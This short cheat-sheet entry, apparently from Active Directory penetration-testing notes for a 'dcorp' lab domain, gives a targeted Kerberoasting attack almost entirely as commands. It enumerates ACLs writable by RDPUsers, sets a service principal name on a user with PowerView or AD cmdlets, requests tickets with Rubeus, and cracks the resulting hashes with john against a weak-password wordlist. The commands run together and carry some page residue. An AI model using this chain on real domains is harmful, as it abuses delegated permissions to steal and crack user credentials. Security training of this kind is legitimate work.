Set-SPN
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}Get-DomainUser -Identity supportuser | select serviceprincipalnameGet-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalNameSet-DomainObject -Identity support1user -Set @{serviceprincipalname=‘dcorp/whatever1'}Set-ADUser -Identity support1user -ServicePrincipalNames @{Add=‘dcorp/whatever1'} Rubeus.exe kerberoast /outfile:targetedhashes.txt
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txtLast updated